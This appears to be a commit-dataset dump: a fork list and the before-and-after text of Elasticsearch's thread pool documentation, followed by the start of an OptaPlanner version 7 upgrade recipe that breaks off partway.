arch,djschny\/elasticsearch,strapdata\/elassandra-test,jimczi\/elasticsearch,andrestc\/elasticsearch,sreeramjayan\/elasticsearch,jsgao0\/elasticsearch,ImpressTV\/elasticsearch,ydsakyclguozi\/elasticsearch,dpursehouse\/elasticsearch,gfyoung\/elasticsearch,EasonYi\/elasticsearch,amit-shar\/elasticsearch,tkssharma\/elasticsearch,LewayneNaidoo\/elasticsearch,rento19962\/elasticsearch,KimTaehee\/elasticsearch,dataduke\/elasticsearch,pablocastro\/elasticsearch,wittyameta\/elasticsearch,himanshuag\/elasticsearch,fforbeck\/elasticsearch,wangtuo\/elasticsearch,mohit\/elasticsearch,artnowo\/elasticsearch,SergVro\/elasticsearch,skearns64\/elasticsearch,areek\/elasticsearch,skearns64\/elasticsearch,ydsakyclguozi\/elasticsearch,palecur\/elasticsearch,xuzha\/elasticsearch,kcompher\/elasticsearch,luiseduardohdbackup\/elasticsearch,yongminxia\/elasticsearch,Chhunlong\/elasticsearch,SergVro\/elasticsearch,iamjakob\/elasticsearch,cwurm\/elasticsearch,Brijeshrpatel9\/elasticsearch,zhiqinghuang\/elasticsearch,LeoYao\/elasticsearch,mjason3\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,lightslife\/elasticsearch,wbowling\/elasticsearch,bestwpw\/elasticsearch,himanshuag\/elasticsearch,truemped\/elasticsearch,jango2015\/elasticsearch,Shepard1212\/elasticsearch,ulkas\/elasticsearch,nknize\/elasticsearch,jimczi\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,springning\/elasticsearch,kunallimaye\/elasticsearch,pozhidaevak\/elasticsearch,snikch\/elasticsearch,kcompher\/elasticsearch,areek\/elasticsearch,s1monw\/elasticsearch,alexshadow007\/elasticsearch,aglne\/elasticsearch,mcku\/elasticsearch,mapr\/elasticsearch,elasticdog\/elasticsearch,fforbeck\/elasticsearch,Helen-Zhao\/elasticsearch,sarwarbhuiyan\/elasticsearch,HarishAtGitHub\/elasticsearch,ulkas\/elasticsearch,iantruslove\/elasticsearch,tkssharma\/elasticsearch,karthikjaps\/elasticsearch,markllama\/elasticsearch,nellicus\/elasticsearch,sdauletau\/elasticsearch,MichaelLiZhou\/elasticsearch,a2lin\/elasticsearch,glefloch\/elasticsearch,jchampion\/elasticsearch,pablocastro\/elasticsearch,yanjunh\/elasticsearch,Collaborne\/elasticsearch,avikurapati\/elasticsearch,JervyShi\/elasticsearch,MisterAndersen\/elasticsearch,snikch\/elasticsearch,kcompher\/elasticsearch,nezirus\/elasticsearch,mnylen\/elasticsearch,pranavraman\/elasticsearch,lchennup\/elasticsearch,Collaborne\/elasticsearch,wayeast\/elasticsearch,wbowling\/elasticsearch,wittyameta\/elasticsearch,pranavraman\/elasticsearch,TonyChai24\/ESSource,EasonYi\/elasticsearch,areek\/elasticsearch,lchennup\/elasticsearch,Helen-Zhao\/elasticsearch,mbrukman\/elasticsearch,bestwpw\/elasticsearch,TonyChai24\/ESSource,yanjunh\/elasticsearch,kaneshin\/elasticsearch,maddin2016\/elasticsearch,vingupta3\/elasticsearch,jango2015\/elasticsearch,StefanGor\/elasticsearch,knight1128\/elasticsearch,mohit\/elasticsearch,jimhooker2002\/elasticsearch,mgalushka\/elasticsearch,njlawton\/elasticsearch,maddin2016\/elasticsearch,franklanganke\/elasticsearch,mapr\/elasticsearch,socialrank\/elasticsearch,winstonewert\/elasticsearch,strapdata\/elassandra5-rc,zeroctu\/elasticsearch,himanshuag\/elasticsearch,gfyoung\/elasticsearch,Uiho\/elasticsearch,ZTE-PaaS\/elasticsearch,jango2015\/elasticsearch,s1monw\/elasticsearch,mjason3\/elasticsearch,NBSW\/elasticsearch,weipinghe\/elasticsearch,ricardocerq\/elasticsearch,acchen97\/elasticsearch,scorpionvicky\/elasticsearch,henakamaMSFT\/elasticsearch,KimTaehee\/elasticsearch,Rygbee\/elasticsearch,kimimj\/elasticsearch,ouyangkongtong\/elasticsearch,myelin\/elasticsearch,acchen97\/elasticsearch,abibell\/elasticsearch,elancom\/elasticsearch,luiseduardohdbackup\/elasticsearch,cnfire\/elasticsearch-1,dongjoon-hyun\/elasticsearch,wenpos\/elasticsearch,adrianbk\/elasticsearch,MichaelLiZhou\/elasticsearch,jbertouch\/elasticsearch,xpandan\/elasticsearch,humandb\/elasticsearch,kaneshin\/elasticsearch,KimTaehee\/elasticsearch,tsohil\/elasticsearch,palecur\/elasticsearch,andrejserafim\/elasticsearch,sreeramjayan\/elasticsearch,rmuir\/elasticsearch,mute\/elasticsearch,lightslife\/elasticsearch,jprante\/elasticsearch,jeteve\/elasticsearch,Siddartha07\/elasticsearch,Chhunlong\/elasticsearch,vroyer\/elassandra,Ansh90\/elasticsearch,lchennup\/elasticsearch,mmaracic\/elasticsearch,knight1128\/elasticsearch,amit-shar\/elasticsearch,mikemccand\/elasticsearch,ZTE-PaaS\/elasticsearch,andrestc\/elasticsearch,vroyer\/elassandra,alexbrasetvik\/elasticsearch,karthikjaps\/elasticsearch,socialrank\/elasticsearch,adrianbk\/elasticsearch,elancom\/elasticsearch,wuranbo\/elasticsearch,camilojd\/elasticsearch,thecocce\/elasticsearch,jbertouch\/elasticsearch,beiske\/elasticsearch,jpountz\/elasticsearch,i-am-Nathan\/elasticsearch,hanswang\/elasticsearch,wbowling\/elasticsearch,fekaputra\/elasticsearch,abibell\/elasticsearch,kcompher\/elasticsearch,F0lha\/elasticsearch,rento19962\/elasticsearch,elasticdog\/elasticsearch,dylan8902\/elasticsearch,szroland\/elasticsearch,overcome\/elasticsearch,sposam\/elasticsearch,andrestc\/elasticsearch,mapr\/elasticsearch,markharwood\/elasticsearch,queirozfcom\/elasticsearch,queirozfcom\/elasticsearch,hafkensite\/elasticsearch,linglaiyao1314\/elasticsearch,zkidkid\/elasticsearch,queirozfcom\/elasticsearch,fooljohnny\/elasticsearch,qwerty4030\/elasticsearch,btiernay\/elasticsearch,ouyangkongtong\/elasticsearch,slavau\/elasticsearch,nellicus\/elasticsearch,F0lha\/elasticsearch,mortonsykes\/elasticsearch,fooljohnny\/elasticsearch,lydonchandra\/elasticsearch,YosuaMichael\/elasticsearch,fred84\/elasticsearch,Ansh90\/elasticsearch,mm0\/elasticsearch,dylan8902\/elasticsearch,mmaracic\/elasticsearch,aglne\/elasticsearch,humandb\/elasticsearch,alexshadow007\/elasticsearch,acchen97\/elasticsearch,obourgain\/elasticsearch,mohit\/elasticsearch,myelin\/elasticsearch,mbrukman\/elasticsearch,iantruslove\/elasticsearch,kevinkluge\/elasticsearch,zhiqinghuang\/elasticsearch,brandonkearby\/elasticsearch,Widen\/elasticsearch,iacdingping\/elasticsearch,njlawton\/elasticsearch,hafkensite\/elasticsearch,lightslife\/elasticsearch,truemped\/elasticsearch,Chhunlong\/elasticsearch,Shepard1212\/elasticsearch,xingguang2013\/elasticsearch,GlenRSmith\/elasticsearch,masaruh\/elasticsearch,spiegela\/elasticsearch,sdauletau\/elasticsearch,nazarewk\/elasticsearch,pablocastro\/elasticsearch,nrkkalyan\/elasticsearch,mm0\/elasticsearch,tkssharma\/elasticsearch,cwurm\/elasticsearch,adrianbk\/elasticsearch,JervyShi\/elasticsearch,kcompher\/elasticsearch,clintongormley\/elasticsearch,alexshadow007\/elasticsearch,Liziyao\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,strapdata\/elassandra5-rc,Helen-Zhao\/elasticsearch,tsohil\/elasticsearch,lmtwga\/elasticsearch,zhiqinghuang\/elasticsearch,onegambler\/elasticsearch,scottsom\/elasticsearch,xingguang2013\/elasticsearch,Kakakakakku\/elasticsearch,tahaemin\/elasticsearch,StefanGor\/elasticsearch,ESamir\/elasticsearch,andrestc\/elasticsearch,himanshuag\/elasticsearch,socialrank\/elasticsearch,henakamaMSFT\/elasticsearch,sauravmondallive\/elasticsearch,himanshuag\/elasticsearch,Helen-Zhao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,vietlq\/elasticsearch,wayeast\/elasticsearch,MetSystem\/elasticsearch,sc0ttkclark\/elasticsearch,masterweb121\/elasticsearch,hirdesh2008\/elasticsearch,elancom\/elasticsearch,trangvh\/elasticsearch,vingupta3\/elasticsearch,rhoml\/elasticsearch,rmuir\/elasticsearch,petabytedata\/elasticsearch,koxa29\/elasticsearch,ThalaivaStars\/OrgRepo1,lydonchandra\/elasticsearch,markllama\/elasticsearch,pranavraman\/elasticsearch,amit-shar\/elasticsearch,kubum\/elasticsearch,yynil\/elasticsearch,episerver\/elasticsearch,rhoml\/elasticsearch,infusionsoft\/elasticsearch,gfyoung\/elasticsearch,Rygbee\/elasticsearch,tsohil\/elasticsearch,schonfeld\/elasticsearch,thecocce\/elasticsearch,mgalushka\/elasticsearch,MetSystem\/elasticsearch,vingupta3\/elasticsearch,schonfeld\/elasticsearch,javachengwc\/elasticsearch,iacdingping\/elasticsearch,mnylen\/elasticsearch,btiernay\/elasticsearch,cnfire\/elasticsearch-1,18098924759\/elasticsearch,Charlesdong\/elasticsearch,mohit\/elasticsearch,wenpos\/elasticsearch,djschny\/elasticsearch,henakamaMSFT\/elasticsearch,palecur\/elasticsearch,aglne\/elasticsearch,mapr\/elasticsearch,fred84\/elasticsearch,mrorii\/elasticsearch,sposam\/elasticsearch,Shekharrajak\/elasticsearch,rajanm\/elasticsearch,MetSystem\/elasticsearch,ThalaivaStars\/OrgRepo1,xingguang2013\/elasticsearch,mjhennig\/elasticsearch,elancom\/elasticsearch,andrejserafim\/elasticsearch,Fsero\/elasticsearch,achow\/elasticsearch,huypx1292\/elasticsearch,yongminxia\/elasticsearch,yongminxia\/elasticsearch,wbowling\/elasticsearch,yuy168\/elasticsearch,koxa29\/elasticsearch,Shepard1212\/elasticsearch,mikemccand\/elasticsearch,areek\/elasticsearch,lydonchandra\/elasticsearch,djschny\/elasticsearch,alexbrasetvik\/elasticsearch,mikemccand\/elasticsearch,areek\/elasticsearch,kaneshin\/elasticsearch,dataduke\/elasticsearch,Siddartha07\/elasticsearch,hirdesh2008\/elasticsearch,amit-shar\/elasticsearch,HarishAtGitHub\/elasticsearch,dpursehouse\/elasticsearch,mcku\/elasticsearch,polyfractal\/elasticsearch,mapr\/elasticsearch,obourgain\/elasticsearch,HarishAtGitHub\/elasticsearch,kingaj\/elasticsearch,wayeast\/elasticsearch,EasonYi\/elasticsearch,MjAbuz\/elasticsearch,myelin\/elasticsearch,pozhidaevak\/elasticsearch,jimczi\/elasticsearch,LewayneNaidoo\/elasticsearch,clintongormley\/elasticsearch,nrkkalyan\/elasticsearch,schonfeld\/elasticsearch,MisterAndersen\/elasticsearch,slavau\/elasticsearch,hafkensite\/elasticsearch,elancom\/elasticsearch,jbertouch\/elasticsearch,gmarz\/elasticsearch,fekaputra\/elasticsearch,xuzha\/elasticsearch,avikurapati\/elasticsearch,gingerwizard\/elasticsearch,fooljohnny\/elasticsearch,bawse\/elasticsearch,mohit\/elasticsearch,MaineC\/elasticsearch,palecur\/elasticsearch,rlugojr\/elasticsearch,wbowling\/elasticsearch,Fsero\/elasticsearch,pritishppai\/elasticsearch,pritishppai\/elasticsearch,jeteve\/elasticsearch,ZTE-PaaS\/elasticsearch,aglne\/elasticsearch,Shekharrajak\/elasticsearch,dpursehouse\/elasticsearch,knight1128\/elasticsearch,szroland\/elasticsearch,scorpionvicky\/elasticsearch,mrorii\/elasticsearch,masaruh\/elasticsearch,JackyMai\/elasticsearch,18098924759\/elasticsearch,adrianbk\/elasticsearch,yongminxia\/elasticsearch,kunallimaye\/elasticsearch,linglaiyao1314\/elasticsearch,18098924759\/elasticsearch,masaruh\/elasticsearch,Siddartha07\/elasticsearch,sdauletau\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,andrestc\/elasticsearch,gfyoung\/elasticsearch,ivansun1010\/elasticsearch,xingguang2013\/elasticsearch,jpountz\/elasticsearch,xingguang2013\/elasticsearch,JervyShi\/elasticsearch,mmaracic\/elasticsearch,tahaemin\/elasticsearch,elasticdog\/elasticsearch,petabytedata\/elasticsearch,kevinkluge\/elasticsearch,cwurm\/elasticsearch,strapdata\/elassandra,LeoYao\/elasticsearch,Fsero\/elasticsearch,vingupta3\/elasticsearch,cwurm\/elasticsearch,Kakakakakku\/elasticsearch,wittyameta\/elasticsearch,springning\/elasticsearch,bestwpw\/elasticsearch,Stacey-Gammon\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,ThalaivaStars\/OrgRepo1,lmtwga\/elasticsearch,sreeramjayan\/elasticsearch,bawse\/elasticsearch,spiegela\/elasticsearch,sauravmondallive\/elasticsearch,bestwpw\/elasticsearch,djschny\/elasticsearch,caengcjd\/elasticsearch,jpountz\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,kalburgimanjunath\/elasticsearch,ouyangkongtong\/elasticsearch,jeteve\/elasticsearch,strapdata\/elassandra,likaiwalkman\/elasticsearch,springning\/elasticsearch,JSCooke\/elasticsearch,smflorentino\/elasticsearch,jchampion\/elasticsearch,Collaborne\/elasticsearch,kenshin233\/elasticsearch,girirajsharma\/elasticsearch,lchennup\/elasticsearch,achow\/elasticsearch,springning\/elasticsearch,franklanganke\/elasticsearch,liweinan0423\/elasticsearch,jpountz\/elasticsearch,iantruslove\/elasticsearch,xpandan\/elasticsearch,mjason3\/elasticsearch,jeteve\/elasticsearch,fforbeck\/elasticsearch,polyfractal\/elasticsearch,jpountz\/elasticsearch,huanzhong\/elasticsearch,springning\/elasticsearch,ricardocerq\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,kingaj\/elasticsearch,markharwood\/elasticsearch,artnowo\/elasticsearch,lzo\/elasticsearch-1,petabytedata\/elasticsearch,sdauletau\/elasticsearch,kunallimaye\/elasticsearch,zeroctu\/elasticsearch,truemped\/elasticsearch,humandb\/elasticsearch,achow\/elasticsearch,Collaborne\/elasticsearch,robin13\/elasticsearch,tebriel\/elasticsearch,uschindler\/elasticsearch,pranavraman\/elasticsearch,nellicus\/elasticsearch,vingupta3\/elasticsearch,brandonkearby\/elasticsearch,TonyChai24\/ESSource,infusionsoft\/elasticsearch,vietlq\/elasticsearch,robin13\/elasticsearch,queirozfcom\/elasticsearch,xpandan\/elasticsearch,diendt\/elasticsearch,btiernay\/elasticsearch,dongjoon-hyun\/elasticsearch,mikemccand\/elasticsearch,vroyer\/elasticassandra,MisterAndersen\/elasticsearch,wenpos\/elasticsearch,schonfeld\/elasticsearch,hydro2k\/elasticsearch,apepper\/elasticsearch,overcome\/elasticsearch,sneivandt\/elasticsearch,spiegela\/elasticsearch,EasonYi\/elasticsearch,truemped\/elasticsearch,khiraiwa\/elasticsearch,Shekharrajak\/elasticsearch,nazarewk\/elasticsearch,kenshin233\/elasticsearch,yuy168\/elasticsearch,wimvds\/elasticsearch,dylan8902\/elasticsearch,ricardocerq\/elasticsearch,girirajsharma\/elasticsearch,liweinan0423\/elasticsearch,szroland\/elasticsearch,jsgao0\/elasticsearch,franklanganke\/elasticsearch,luiseduardohdbackup\/elasticsearch,nrkkalyan\/elasticsearch,wimvds\/elasticsearch,huypx1292\/elasticsearch,Shekharrajak\/elasticsearch,adrianbk\/elasticsearch,hanswang\/elasticsearch,mrorii\/elasticsearch,NBSW\/elasticsearch,ImpressTV\/elasticsearch,HonzaKral\/elasticsearch,LeoYao\/elasticsearch,kalburgimanjunath\/elasticsearch,markharwood\/elasticsearch,kunallimaye\/elasticsearch,wuranbo\/elasticsearch,camilojd\/elasticsearch,TonyChai24\/ESSource,andrejserafim\/elasticsearch,pritishppai\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,maddin2016\/elasticsearch,NBSW\/elasticsearch,aglne\/elasticsearch,JSCooke\/elasticsearch,Collaborne\/elasticsearch,rajanm\/elasticsearch,camilojd\/elasticsearch,JervyShi\/elasticsearch,rmuir\/elasticsearch,yongminxia\/elasticsearch,LewayneNaidoo\/elasticsearch,kubum\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,weipinghe\/elasticsearch,gmarz\/elasticsearch,petabytedata\/elasticsearch,spiegela\/elasticsearch,schonfeld\/elasticsearch,obourgain\/elasticsearch,iacdingping\/elasticsearch,hanswang\/elasticsearch,iacdingping\/elasticsearch,socialrank\/elasticsearch,jimhooker2002\/elasticsearch,sdauletau\/elasticsearch,masterweb121\/elasticsearch,dylan8902\/elasticsearch,ricardocerq\/elasticsearch,vietlq\/elasticsearch,HonzaKral\/elasticsearch,AndreKR\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,Shekharrajak\/elasticsearch,TonyChai24\/ESSource,mm0\/elasticsearch,mrorii\/elasticsearch,Chhunlong\/elasticsearch,fooljohnny\/elasticsearch,abibell\/elasticsearch,beiske\/elasticsearch,jango2015\/elasticsearch,glefloch\/elasticsearch,rlugojr\/elasticsearch,davidvgalbraith\/elasticsearch,i-am-Nathan\/elasticsearch,ImpressTV\/elasticsearch,iantruslove\/elasticsearch,karthikjaps\/elasticsearch,strapdata\/elassandra-test,sreeramjayan\/elasticsearch,lydonchandra\/elasticsearch,18098924759\/elasticsearch,MichaelLiZhou\/elasticsearch,coding0011\/elasticsearch,martinstuga\/elasticsearch,lchennup\/elasticsearch,rlugojr\/elasticsearch,hirdesh2008\/elasticsearch,LeoYao\/elasticsearch,ESamir\/elasticsearch,likaiwalkman\/elasticsearch,kenshin233\/elasticsearch,Collaborne\/elasticsearch,ThalaivaStars\/OrgRepo1,hanswang\/elasticsearch,vroyer\/elasticassandra,loconsolutions\/elasticsearch,YosuaMichael\/elasticsearch,episerver\/elasticsearch,nrkkalyan\/elasticsearch,sposam\/elasticsearch,MaineC\/elasticsearch,coding0011\/elasticsearch,andrejserafim\/elasticsearch,pritishppai\/elasticsearch,pranavraman\/elasticsearch,ESamir\/elasticsearch,nomoa\/elasticsearch,vietlq\/elasticsearch,kunallimaye\/elasticsearch,Widen\/elasticsearch,rmuir\/elasticsearch,robin13\/elasticsearch,shreejay\/elasticsearch,kalimatas\/elasticsearch,jango2015\/elasticsearch,lightslife\/elasticsearch,obourgain\/elasticsearch,caengcjd\/elasticsearch,jprante\/elasticsearch,yanjunh\/elasticsearch,Brijeshrpatel9\/elasticsearch,mmaracic\/elasticsearch,loconsolutions\/elasticsearch,alexbrasetvik\/elasticsearch,elancom\/elasticsearch,i-am-Nathan\/elasticsearch,onegambler\/elasticsearch,bestwpw\/elasticsearch,MichaelLiZhou\/elasticsearch,markharwood\/elasticsearch,rajanm\/elasticsearch,koxa29\/elasticsearch,Rygbee\/elasticsearch,MisterAndersen\/elasticsearch,Ansh90\/elasticsearch,episerver\/elasticsearch,slavau\/elasticsearch,pablocastro\/elasticsearch,wittyameta\/elasticsearch,lks21c\/elasticsearch,springning\/elasticsearch,nilabhsagar\/elasticsearch,zhiqinghuang\/elasticsearch,himanshuag\/elasticsearch,Rygbee\/elasticsearch,socialrank\/elasticsearch,Fsero\/elasticsearch,sposam\/elasticsearch,kubum\/elasticsearch,dpursehouse\/elasticsearch,sneivandt\/elasticsearch,kalburgimanjunath\/elasticsearch,drewr\/elasticsearch,Charlesdong\/elasticsearch,episerver\/elasticsearch,kingaj\/elasticsearch,jimhooker2002\/elasticsearch,lchennup\/elasticsearch,wangtuo\/elasticsearch,MetSystem\/elasticsearch,mjason3\/elasticsearch,huanzhong\/elasticsearch,trangvh\/elasticsearch,qwerty4030\/elasticsearch,huypx1292\/elasticsearch,jimhooker2002\/elasticsearch,Shekharrajak\/elasticsearch,mnylen\/elasticsearch,achow\/elasticsearch,jimhooker2002\/elasticsearch,jsgao0\/elasticsearch,C-Bish\/elasticsearch,a2lin\/elasticsearch,SergVro\/elasticsearch,jprante\/elasticsearch,martinstuga\/elasticsearch,LewayneNaidoo\/elasticsearch,yynil\/elasticsearch,masterweb121\/elasticsearch,mbrukman\/elasticsearch,sreeramjayan\/elasticsearch,winstonewert\/elasticsearch,polyfractal\/elasticsearch,mute\/elasticsearch,Chhunlong\/elasticsearch,tahaemin\/elasticsearch,lks21c\/elasticsearch,kimimj\/elasticsearch,achow\/elasticsearch,mrorii\/elasticsearch,yuy168\/elasticsearch,nellicus\/elasticsearch,fforbeck\/elasticsearch,sposam\/elasticsearch,umeshdangat\/elasticsearch,HarishAtGitHub\/elasticsearch,mcku\/elasticsearch,thecocce\/elasticsearch,YosuaMichael\/elasticsearch,markllama\/elasticsearch,lydonchandra\/elasticsearch,bawse\/elasticsearch,davidvgalbraith\/elasticsearch,trangvh\/elasticsearch","old_file":"docs\/reference\/modules\/threadpool.asciidoc","new_file":"docs\/reference\/modules\/threadpool.asciidoc","new_contents":"[[modules-threadpool]]\n== Thread Pool\n\nA node holds several thread pools in order to improve how threads memory consumption\nare managed within a node. Many of these pools also have queues associated with them,\nwhich allow pending requests to be held instead\nof discarded.\n\n\nThere are several thread pools, but the important ones include:\n\n`index`::\n For index\/delete operations. Defaults to `fixed`\n with a size of `# of available processors`,\n queue_size of `200`.\n\n`search`::\n For count\/search operations. Defaults to `fixed`\n with a size of `3x # of available processors`,\n queue_size of `1000`.\n\n`suggest`::\n For suggest operations. Defaults to `fixed`\n with a size of `# of available processors`,\n queue_size of `1000`.\n\n`get`::\n For get operations. Defaults to `fixed`\n with a size of `# of available processors`,\n queue_size of `1000`.\n\n`bulk`::\n For bulk operations. Defaults to `fixed`\n with a size of `# of available processors`,\n queue_size of `50`.\n\n`percolate`::\n For percolate operations. Defaults to `fixed`\n with a size of `# of available processors`,\n queue_size of `1000`.\n\n`snapshot`::\n For snapshot\/restore operations. Defaults to `scaling` with a\n keep-alive of `5m` and a size of `min(5, (# of available processors)\/2)`.\n\n`warmer`::\n For segment warm-up operations. Defaults to `scaling` with a\n keep-alive of `5m` and a size of `min(5, (# of available processors)\/2)`.\n\n`refresh`::\n For refresh operations. Defaults to `scaling` with a\n keep-alive of `5m` and a size of `min(10, (# of available processors)\/2)`.\n\n`listener`::\n Mainly for java client executing of action when listener threaded is set to true.\n Default size of `(# of available processors)\/2`, max at 10.\n\nChanging a specific thread pool can be done by setting its type and\nspecific type parameters, for example, changing the `index` thread pool\nto have more threads:\n\n[source,js]\n--------------------------------------------------\nthreadpool:\n index:\n type: fixed\n size: 30\n--------------------------------------------------\n\nNOTE: you can update threadpool settings live using\n <<cluster-update-settings>>.\n\n\n[float]\n[[types]]\n=== Thread pool types\n\nThe following are the types of thread pools that can be used and their\nrespective parameters:\n\n[float]\n==== `cache`\n\nThe `cache` thread pool is an unbounded thread pool that will spawn a\nthread if there are pending requests. Here is an example of how to set\nit:\n\n[source,js]\n--------------------------------------------------\nthreadpool:\n index:\n type: cached\n--------------------------------------------------\n\n[float]\n==== `fixed`\n\nThe `fixed` thread pool holds a fixed size of threads to handle the\nrequests with a queue (optionally bounded) for pending requests that\nhave no threads to service them.\n\nThe `size` parameter controls the number of threads, and defaults to the\nnumber of cores times 5.\n\nThe `queue_size` allows to control the size of the queue of pending\nrequests that have no threads to execute them. By default, it is set to\n`-1` which means its unbounded. When a request comes in and the queue is\nfull, it will abort the request.\n\n[source,js]\n--------------------------------------------------\nthreadpool:\n index:\n type: fixed\n size: 30\n queue_size: 1000\n--------------------------------------------------\n\n[float]\n==== `scaling`\n\nThe `scaling` thread pool holds a dynamic number of threads. This number is\nproportional to the workload and varies between 1 and the value of the\n`size` parameter.\n\nThe `keep_alive` parameter determines how long a thread should be kept\naround in the thread pool without it doing any work.\n\n[source,js]\n--------------------------------------------------\nthreadpool:\n warmer:\n type: scaling\n size: 8\n keep_alive: 2m\n--------------------------------------------------\n\n[float]\n[[processors]]\n=== Processors setting\nThe number of processors is automatically detected, and the thread pool\nsettings are automatically set based on it. Sometimes, the number of processors\nare wrongly detected, in such cases, the number of processors can be\nexplicitly set using the `processors` setting.\n\nIn order to check the number of processors detected, use the nodes info\nAPI with the `os` flag.\n","old_contents":"[[modules-threadpool]]\n== Thread Pool\n\nA node holds several thread pools in order to improve how threads memory consumption\nare managed within a node. Many of these pools also have queues associated with them,\nwhich allow pending requests to be held instead\nof discarded.\n\n\nThere are several thread pools, but the important ones include:\n\n`index`::\n For index\/delete operations. Defaults to `fixed`\n with a size of `# of available processors`,\n queue_size of `200`.\n\n`search`::\n For count\/search operations. Defaults to `fixed`\n with a size of `3x # of available processors`,\n queue_size of `1000`.\n\n`suggest`::\n For suggest operations. Defaults to `fixed`\n with a size of `# of available processors`,\n queue_size of `1000`.\n\n`get`::\n For get operations. Defaults to `fixed`\n with a size of `# of available processors`,\n queue_size of `1000`.\n\n`bulk`::\n For bulk operations. Defaults to `fixed`\n with a size of `# of available processors`,\n queue_size of `50`.\n\n`percolate`::\n For percolate operations. Defaults to `fixed`\n with a size of `# of available processors`,\n queue_size of `1000`.\n\n`snapshot`::\n For snapshot\/restore operations. Defaults to `scaling`,\n keep-alive `5m` with a size of `(# of available processors)\/2`.\n\n`warmer`::\n For segment warm-up operations. Defaults to `scaling`\n with a `5m` keep-alive.\n\n`refresh`::\n For refresh operations. Defaults to `scaling`\n with a `5m` keep-alive.\n\n`listener`::\n Mainly for java client executing of action when listener threaded is set to true.\n Default size of `(# of available processors)\/2`, max at 10.\n\nChanging a specific thread pool can be done by setting its type and\nspecific type parameters, for example, changing the `index` thread pool\nto have more threads:\n\n[source,js]\n--------------------------------------------------\nthreadpool:\n index:\n type: fixed\n size: 30\n--------------------------------------------------\n\nNOTE: you can update threadpool settings live using\n <<cluster-update-settings>>.\n\n\n[float]\n[[types]]\n=== Thread pool types\n\nThe following are the types of thread pools that can be used and their\nrespective parameters:\n\n[float]\n==== `cache`\n\nThe `cache` thread pool is an unbounded thread pool that will spawn a\nthread if there are pending requests. Here is an example of how to set\nit:\n\n[source,js]\n--------------------------------------------------\nthreadpool:\n index:\n type: cached\n--------------------------------------------------\n\n[float]\n==== `fixed`\n\nThe `fixed` thread pool holds a fixed size of threads to handle the\nrequests with a queue (optionally bounded) for pending requests that\nhave no threads to service them.\n\nThe `size` parameter controls the number of threads, and defaults to the\nnumber of cores times 5.\n\nThe `queue_size` allows to control the size of the queue of pending\nrequests that have no threads to execute them. By default, it is set to\n`-1` which means its unbounded. When a request comes in and the queue is\nfull, it will abort the request.\n\n[source,js]\n--------------------------------------------------\nthreadpool:\n index:\n type: fixed\n size: 30\n queue_size: 1000\n--------------------------------------------------\n\n[float]\n[[processors]]\n=== Processors setting\nThe number of processors is automatically detected, and the thread pool\nsettings are automatically set based on it. Sometimes, the number of processors\nare wrongly detected, in such cases, the number of processors can be\nexplicitly set using the `processors` setting.\n\nIn order to check the number of processors detected, use the nodes info\nAPI with the `os` flag.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c6638be31be3a258d1b535fafcc26fbc88de7a56","subject":"PLANNER-1238 Didn't make 7.11.0.Final","message":"PLANNER-1238 Didn't make 7.11.0.Final\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"download\/upgradeRecipe\/upgradeRecipe7.adoc","new_file":"download\/upgradeRecipe\/upgradeRecipe7.adoc","new_contents":"= Upgrade recipe 7\n:awestruct-description: Upgrade to OptaPlanner 7 from a previous version.\n:awestruct-layout: upgradeRecipeBase\n:awestruct-priority: 0.5\n:awestruct-upgrade_recipe_version: 7\n\n\n== From 6.5.0.Final to 7.0.0.Beta1\n\n=== Backwards incompatible changes to the public API in 7.0\n\nBecause this is a new major version number (7.0), which is the foundation for the 7.x series for the next few years,\nit allows us to make backwards incompatible changes to the public API _for the long term benefit of this project_.\n\nWe kept these backwards incompatible changes to a strict minimum\n(by favoring deprecation over removal) and will not introduce any additional ones during the 7.x era.\n\nAny backwards incompatible changes are annotated with a [.label.label-danger.label-as-badge.label-public-api]#Public API# badge.\n\n\n[.upgrade-recipe-major.upgrade-recipe-public-api]\n=== Java 8 or higher required\n\nIf you're using JRE or JDK 6 or 7, upgrade to JDK 8 or higher.\n\nWe currently intend to support a minimal version of Java 8 throughout the entire 7.x series.\n\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== Deprecated methods removed\n\nThe following long term deprecated methods have been finally removed:\n\n* Setters on `ScoreHolder` implementations, such as `HardSoftScoreHolder.setHardScore(int)` and `setSoftScore(int)`.\nUse `addHardConstraintMatch(...)` and `addSoftConstraintMatch(...)` in your score rules instead.\nSee link:.\/upgradeRecipe6.0.html[this upgrade recipe].\n\n* The experimental, deprecated, hybrid metaheuristic called `LATE_SIMULATED_ANNEALING`\n(which was inspired by both Late Acceptance and Simulated Annealing) has been removed.\n\n* The dead, deprecated code of `DeciderScoreComparatorFactory` has been removed.\nSee link:.\/upgradeRecipe6.2.html[this upgrade recipe].\n\n* The deprecated `SolverBenchmarkBluePrintType.ALL_CONSTRUCTION_HEURISTIC_TYPES` has been removed.\nSee link:.\/upgradeRecipe6.3.html[this upgrade recipe].\n\n\n[.upgrade-recipe-major]\n=== `Solution` interface removed (deprecated)\n\nYour solution class no longer needs to have both the `@PlanningSolution` annotation and implement the `Solution` interface,\nonly the annotation suffices. The `Solution` interface has been deprecated and will be removed in a future version.\n\nRemove the `Solution` interface, annotate the `getScore()` method with `@PlanningScore`\nand replace the `getProblemFacts()` method with a `@ProblemFactCollectionProperty` annotation directly on every problem fact getter (or field).\n\nBefore in `*.java`:\n[source, java]\n----\n@PlanningSolution\npublic class CloudBalance implements Solution<HardSoftScore> {\n\n private List<CloudComputer> computerList;\n ...\n\n private HardSoftScore score;\n\n @ValueRangeProvider(id = \"computerRange\")\n public List<CloudComputer> getComputerList() {...}\n\n public HardSoftScore getScore() {...}\n public void setScore(HardSoftScore score) {...}\n\n public Collection<? extends Object> getProblemFacts() {\n List<Object> facts = new ArrayList<Object>();\n facts.addAll(computerList);\n ...\n 